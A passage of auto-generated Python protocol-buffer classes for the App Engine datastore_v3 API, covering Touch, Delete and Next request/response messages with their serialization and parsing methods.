      out.putVarInt32(self.key_[i].ByteSizePartial())
      self.key_[i].OutputPartial(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(18)
      out.putVarInt32(self.composite_index_[i].ByteSizePartial())
      self.composite_index_[i].OutputPartial(out)
    if (self.has_force_):
      out.putVarInt32(24)
      out.putBoolean(self.force_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSizePartial())
      self.snapshot_[i].OutputPartial(out)
    if (self.has_header_):
      out.putVarInt32(82)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    """Decode from decoder `d`, merging into self; unknown tags skipped, tag 0 raises."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_key().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_composite_index().TryMerge(tmp)
        continue
      if tt == 24:
        self.set_force(d.getBoolean())
        continue
      if tt == 74:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_snapshot().TryMerge(tmp)
        continue
      if tt == 82:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Text rendering; `prefix` indents, `printElemNumber` adds (index) markers."""
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.key_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("key%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    cnt=0
    for e in self.composite_index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("composite_index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_force_: res+=prefix+("force: %s\n" % self.DebugFormatBool(self.force_))
    cnt=0
    for e in self.snapshot_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("snapshot%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Class-definition-time helper: dense tuple from sparse {tag: value}.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Proto field numbers.
  kheader = 10
  kkey = 1
  kcomposite_index = 2
  kforce = 3
  ksnapshot = 9

  # Tag -> field-name table (index 0 is the "ErrorCode" sentinel).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "key",
    2: "composite_index",
    3: "force",
    9: "snapshot",
    10: "header",
  }, 10)

  # Tag -> wire-type table.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    9: ProtocolBuffer.Encoder.STRING,
    10: ProtocolBuffer.Encoder.STRING,
  }, 10, ProtocolBuffer.Encoder.MAX_TYPE)


  # Style metadata emitted by the proto compiler (unused here).
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.TouchRequest'
class TouchResponse(ProtocolBuffer.ProtocolMessage):
  """Generated message `apphosting_datastore_v3.TouchResponse`.

  Single field: optional Cost `cost`, tag 1 (lazily constructed).

  Do not edit by hand: this class is produced by the protocol-buffer
  compiler and its exact statement order is load-bearing.
  """
  # Class-level presence flag / default for the optional `cost` field.
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    # Guards lazy construction of cost_ across threads.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def cost(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):
    # Clears the contents in place (if any) rather than dropping the object.
    if self.has_cost_:
      self.has_cost_ = 0;
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_


  def MergeFrom(self, x):
    """Merge the set fields of another TouchResponse `x` into self."""
    assert x is not self
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())

  def Equals(self, x):
    """Field-by-field equality; returns 1/0 (generated-code convention)."""
    if x is self: return 1
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Return 1 iff `cost` (when set) is initialized; reasons go in debug_strs."""
    initialized = 1
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    """Exact serialized size in bytes."""
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    return n

  def ByteSizePartial(self):
    """Like ByteSize but sizes `cost` with ByteSizePartial."""
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_cost()

  def OutputUnchecked(self, out):
    """Serialize to `out` without initialization checks (tag 10)."""
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)

  def OutputPartial(self, out):
    """Serialize the set fields to `out` using Partial sizes/serializers."""
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)

  def TryMerge(self, d):
    """Decode from decoder `d`, merging into self; unknown tags skipped, tag 0 raises."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Text rendering; `prefix` indents, `printElemNumber` adds (index) markers."""
    res=""
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Class-definition-time helper: dense tuple from sparse {tag: value}.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Proto field numbers.
  kcost = 1

  # Tag -> field-name table (index 0 is the "ErrorCode" sentinel).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cost",
  }, 1)

  # Tag -> wire-type table.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)


  # Style metadata emitted by the proto compiler (unused here).
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.TouchResponse'
class DeleteRequest(ProtocolBuffer.ProtocolMessage):
  """Generated message `apphosting_datastore_v3.DeleteRequest`.

  Fields:
    header          -- optional InternalHeader, tag 10 (lazily constructed).
    key             -- repeated Reference, tag 6.
    transaction     -- optional Transaction, tag 5 (lazily constructed).
    composite_index -- repeated CompositeIndex, tag 11.
    trusted         -- optional bool, tag 4.
    force           -- optional bool, tag 7.
    mark_changes    -- optional bool, tag 8.
    snapshot        -- repeated Snapshot, tag 9.

  Do not edit by hand: this class is produced by the protocol-buffer
  compiler and its exact statement order is load-bearing.
  """
  # Class-level presence flags / defaults for the optional fields.
  has_header_ = 0
  header_ = None
  has_transaction_ = 0
  transaction_ = None
  has_trusted_ = 0
  trusted_ = 0
  has_force_ = 0
  force_ = 0
  has_mark_changes_ = 0
  mark_changes_ = 0

  def __init__(self, contents=None):
    self.key_ = []
    self.composite_index_ = []
    self.snapshot_ = []
    # Guards lazy construction of header_/transaction_ across threads.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):
    # Clears the contents in place (if any) rather than dropping the object.
    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def key_size(self): return len(self.key_)
  def key_list(self): return self.key_

  def key(self, i):
    return self.key_[i]

  def mutable_key(self, i):
    return self.key_[i]

  def add_key(self):
    # Append and return a fresh Reference for the caller to fill in.
    x = Reference()
    self.key_.append(x)
    return x

  def clear_key(self):
    self.key_ = []
  def transaction(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.transaction_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.transaction_ is None: self.transaction_ = Transaction()
      finally:
        self.lazy_init_lock_.release()
    return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction()

  def clear_transaction(self):

    if self.has_transaction_:
      self.has_transaction_ = 0;
      if self.transaction_ is not None: self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  def composite_index_size(self): return len(self.composite_index_)
  def composite_index_list(self): return self.composite_index_

  def composite_index(self, i):
    return self.composite_index_[i]

  def mutable_composite_index(self, i):
    return self.composite_index_[i]

  def add_composite_index(self):
    x = CompositeIndex()
    self.composite_index_.append(x)
    return x

  def clear_composite_index(self):
    self.composite_index_ = []
  def trusted(self): return self.trusted_

  def set_trusted(self, x):
    self.has_trusted_ = 1
    self.trusted_ = x

  def clear_trusted(self):
    if self.has_trusted_:
      self.has_trusted_ = 0
      self.trusted_ = 0

  def has_trusted(self): return self.has_trusted_

  def force(self): return self.force_

  def set_force(self, x):
    self.has_force_ = 1
    self.force_ = x

  def clear_force(self):
    if self.has_force_:
      self.has_force_ = 0
      self.force_ = 0

  def has_force(self): return self.has_force_

  def mark_changes(self): return self.mark_changes_

  def set_mark_changes(self, x):
    self.has_mark_changes_ = 1
    self.mark_changes_ = x

  def clear_mark_changes(self):
    if self.has_mark_changes_:
      self.has_mark_changes_ = 0
      self.mark_changes_ = 0

  def has_mark_changes(self): return self.has_mark_changes_

  def snapshot_size(self): return len(self.snapshot_)
  def snapshot_list(self): return self.snapshot_

  def snapshot(self, i):
    return self.snapshot_[i]

  def mutable_snapshot(self, i):
    return self.snapshot_[i]

  def add_snapshot(self):
    x = Snapshot()
    self.snapshot_.append(x)
    return x

  def clear_snapshot(self):
    self.snapshot_ = []

  def MergeFrom(self, x):
    """Merge all set fields of another DeleteRequest `x` into self."""
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    for i in xrange(x.key_size()): self.add_key().CopyFrom(x.key(i))
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    for i in xrange(x.composite_index_size()): self.add_composite_index().CopyFrom(x.composite_index(i))
    if (x.has_trusted()): self.set_trusted(x.trusted())
    if (x.has_force()): self.set_force(x.force())
    if (x.has_mark_changes()): self.set_mark_changes(x.mark_changes())
    for i in xrange(x.snapshot_size()): self.add_snapshot().CopyFrom(x.snapshot(i))

  def Equals(self, x):
    """Field-by-field equality; returns 1/0 (generated-code convention)."""
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if len(self.key_) != len(x.key_): return 0
    for e1, e2 in zip(self.key_, x.key_):
      if e1 != e2: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if len(self.composite_index_) != len(x.composite_index_): return 0
    for e1, e2 in zip(self.composite_index_, x.composite_index_):
      if e1 != e2: return 0
    if self.has_trusted_ != x.has_trusted_: return 0
    if self.has_trusted_ and self.trusted_ != x.trusted_: return 0
    if self.has_force_ != x.has_force_: return 0
    if self.has_force_ and self.force_ != x.force_: return 0
    if self.has_mark_changes_ != x.has_mark_changes_: return 0
    if self.has_mark_changes_ and self.mark_changes_ != x.mark_changes_: return 0
    if len(self.snapshot_) != len(x.snapshot_): return 0
    for e1, e2 in zip(self.snapshot_, x.snapshot_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Return 1 iff all sub-messages are initialized; collects reasons in debug_strs."""
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    for p in self.key_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_transaction_ and not self.transaction_.IsInitialized(debug_strs)): initialized = 0
    for p in self.composite_index_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.snapshot_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    """Exact serialized size in bytes (bool fields cost 2: 1 tag + 1 value)."""
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSize())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSize())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSize())
    if (self.has_trusted_): n += 2
    if (self.has_force_): n += 2
    if (self.has_mark_changes_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSize())
    return n

  def ByteSizePartial(self):
    """Like ByteSize but sizes sub-messages with their Partial variants."""
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSizePartial())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSizePartial())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSizePartial())
    if (self.has_trusted_): n += 2
    if (self.has_force_): n += 2
    if (self.has_mark_changes_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_header()
    self.clear_key()
    self.clear_transaction()
    self.clear_composite_index()
    self.clear_trusted()
    self.clear_force()
    self.clear_mark_changes()
    self.clear_snapshot()

  def OutputUnchecked(self, out):
    """Serialize to `out` without initialization checks.

    Tags written in ascending order: 32, 42, 50, 56, 64, 74, 82, 90.
    """
    if (self.has_trusted_):
      out.putVarInt32(32)
      out.putBoolean(self.trusted_)
    if (self.has_transaction_):
      out.putVarInt32(42)
      out.putVarInt32(self.transaction_.ByteSize())
      self.transaction_.OutputUnchecked(out)
    for i in xrange(len(self.key_)):
      out.putVarInt32(50)
      out.putVarInt32(self.key_[i].ByteSize())
      self.key_[i].OutputUnchecked(out)
    if (self.has_force_):
      out.putVarInt32(56)
      out.putBoolean(self.force_)
    if (self.has_mark_changes_):
      out.putVarInt32(64)
      out.putBoolean(self.mark_changes_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSize())
      self.snapshot_[i].OutputUnchecked(out)
    if (self.has_header_):
      out.putVarInt32(82)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(90)
      out.putVarInt32(self.composite_index_[i].ByteSize())
      self.composite_index_[i].OutputUnchecked(out)

  def OutputPartial(self, out):
    """Serialize set fields to `out` using Partial sizes/serializers (same tag order as OutputUnchecked)."""
    if (self.has_trusted_):
      out.putVarInt32(32)
      out.putBoolean(self.trusted_)
    if (self.has_transaction_):
      out.putVarInt32(42)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    for i in xrange(len(self.key_)):
      out.putVarInt32(50)
      out.putVarInt32(self.key_[i].ByteSizePartial())
      self.key_[i].OutputPartial(out)
    if (self.has_force_):
      out.putVarInt32(56)
      out.putBoolean(self.force_)
    if (self.has_mark_changes_):
      out.putVarInt32(64)
      out.putBoolean(self.mark_changes_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSizePartial())
      self.snapshot_[i].OutputPartial(out)
    if (self.has_header_):
      out.putVarInt32(82)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(90)
      out.putVarInt32(self.composite_index_[i].ByteSizePartial())
      self.composite_index_[i].OutputPartial(out)

  def TryMerge(self, d):
    """Decode from decoder `d`, merging into self; unknown tags skipped, tag 0 raises."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 32:
        self.set_trusted(d.getBoolean())
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 50:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_key().TryMerge(tmp)
        continue
      if tt == 56:
        self.set_force(d.getBoolean())
        continue
      if tt == 64:
        self.set_mark_changes(d.getBoolean())
        continue
      if tt == 74:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_snapshot().TryMerge(tmp)
        continue
      if tt == 82:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue
      if tt == 90:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_composite_index().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Text rendering; `prefix` indents, `printElemNumber` adds (index) markers."""
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.key_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("key%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.composite_index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("composite_index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_trusted_: res+=prefix+("trusted: %s\n" % self.DebugFormatBool(self.trusted_))
    if self.has_force_: res+=prefix+("force: %s\n" % self.DebugFormatBool(self.force_))
    if self.has_mark_changes_: res+=prefix+("mark_changes: %s\n" % self.DebugFormatBool(self.mark_changes_))
    cnt=0
    for e in self.snapshot_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("snapshot%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Class-definition-time helper: dense tuple from sparse {tag: value}.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Proto field numbers.
  kheader = 10
  kkey = 6
  ktransaction = 5
  kcomposite_index = 11
  ktrusted = 4
  kforce = 7
  kmark_changes = 8
  ksnapshot = 9

  # Tag -> field-name table (index 0 is the "ErrorCode" sentinel).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    4: "trusted",
    5: "transaction",
    6: "key",
    7: "force",
    8: "mark_changes",
    9: "snapshot",
    10: "header",
    11: "composite_index",
  }, 11)

  # Tag -> wire-type table.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.STRING,
    7: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.NUMERIC,
    9: ProtocolBuffer.Encoder.STRING,
    10: ProtocolBuffer.Encoder.STRING,
    11: ProtocolBuffer.Encoder.STRING,
  }, 11, ProtocolBuffer.Encoder.MAX_TYPE)


  # Style metadata emitted by the proto compiler (unused here).
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.DeleteRequest'
class DeleteResponse(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.DeleteResponse.

  Fields:
    cost    -- optional Cost submessage (tag 1), lazily constructed.
    version -- repeated int64 (tag 3).

  Do not edit by hand: the tag numbers and byte-size arithmetic below
  encode the wire format exactly.
  """
  # Class-level defaults; overwritten per-instance on first set.
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    self.version_ = []
    # Guards lazy construction of the optional `cost` submessage.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def cost(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):

    if self.has_cost_:
      self.has_cost_ = 0;
      # Clear (don't drop) the submessage so the lazy instance is reused.
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_

  def version_size(self): return len(self.version_)
  def version_list(self): return self.version_

  def version(self, i):
    return self.version_[i]

  def set_version(self, i, x):
    self.version_[i] = x

  def add_version(self, x):
    self.version_.append(x)

  def clear_version(self):
    self.version_ = []


  def MergeFrom(self, x):
    # Merge fields from another DeleteResponse; repeated values append.
    assert x is not self
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())
    for i in xrange(x.version_size()): self.add_version(x.version(i))

  def Equals(self, x):
    # Field-by-field equality; returns 1/0 (generated-code convention).
    if x is self: return 1
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    if len(self.version_) != len(x.version_): return 0
    for e1, e2 in zip(self.version_, x.version_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # All fields optional/repeated here; only recurse into a set `cost`.
    initialized = 1
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    # Serialized size: 1 tag byte + length-prefixed cost; 1 tag byte per
    # version entry plus its varint encoding.
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    return n

  def ByteSizePartial(self):
    # Same as ByteSize but tolerates uninitialized submessages.
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    return n

  def Clear(self):
    self.clear_cost()
    self.clear_version()

  def OutputUnchecked(self, out):
    # Wire tags: 10 = (field 1 << 3 | length-delimited), 24 = (field 3 << 3 | varint).
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(24)
      out.putVarInt64(self.version_[i])

  def OutputPartial(self, out):
    # Like OutputUnchecked but uses partial sizes (missing required
    # subfields allowed).
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(24)
      out.putVarInt64(self.version_[i])

  def TryMerge(self, d):
    # Decode from Decoder `d`, dispatching on wire tag; unknown tags are
    # skipped, tag 0 is malformed input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue
      if tt == 24:
        self.add_version(d.getVarInt64())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    # Human-readable debug text; nested messages indent by two spaces.
    res=""
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.version_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("version%s: %s\n" % (elm, self.DebugFormatInt64(e)))
      cnt+=1
    return res


  # Expand a sparse {tag: value} dict into a dense tuple (class-body helper).
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field-number constants.
  kcost = 1
  kversion = 3

  # Tag number -> field name, for debug formatting.
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cost",
    3: "version",
  }, 3)

  # Tag number -> wire type.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.DeleteResponse'
class NextRequest(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.NextRequest.

  Fields:
    header  -- optional InternalHeader (tag 5), lazily constructed.
    cursor  -- required Cursor (tag 1), eagerly constructed in __init__.
    count   -- optional int32 (tag 2).
    offset  -- optional int32 (tag 4).
    compile -- optional bool (tag 3).

  Do not edit by hand: tag numbers and byte-size arithmetic encode the
  wire format exactly.
  """
  # Class-level defaults; overwritten per-instance on first set.
  has_header_ = 0
  header_ = None
  has_cursor_ = 0
  has_count_ = 0
  count_ = 0
  has_offset_ = 0
  offset_ = 0
  has_compile_ = 0
  compile_ = 0

  def __init__(self, contents=None):
    # `cursor` is a required field, so it is built eagerly (no lazy init).
    self.cursor_ = Cursor()
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def cursor(self): return self.cursor_

  def mutable_cursor(self): self.has_cursor_ = 1; return self.cursor_

  def clear_cursor(self):self.has_cursor_ = 0; self.cursor_.Clear()

  def has_cursor(self): return self.has_cursor_

  def count(self): return self.count_

  def set_count(self, x):
    self.has_count_ = 1
    self.count_ = x

  def clear_count(self):
    if self.has_count_:
      self.has_count_ = 0
      self.count_ = 0

  def has_count(self): return self.has_count_

  def offset(self): return self.offset_

  def set_offset(self, x):
    self.has_offset_ = 1
    self.offset_ = x

  def clear_offset(self):
    if self.has_offset_:
      self.has_offset_ = 0
      self.offset_ = 0

  def has_offset(self): return self.has_offset_

  def compile(self): return self.compile_

  def set_compile(self, x):
    self.has_compile_ = 1
    self.compile_ = x

  def clear_compile(self):
    if self.has_compile_:
      self.has_compile_ = 0
      self.compile_ = 0

  def has_compile(self): return self.has_compile_


  def MergeFrom(self, x):
    # Merge all set fields from another NextRequest.
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_cursor()): self.mutable_cursor().MergeFrom(x.cursor())
    if (x.has_count()): self.set_count(x.count())
    if (x.has_offset()): self.set_offset(x.offset())
    if (x.has_compile()): self.set_compile(x.compile())

  def Equals(self, x):
    # Field-by-field equality; returns 1/0 (generated-code convention).
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_cursor_ != x.has_cursor_: return 0
    if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
    if self.has_count_ != x.has_count_: return 0
    if self.has_count_ and self.count_ != x.count_: return 0
    if self.has_offset_ != x.has_offset_: return 0
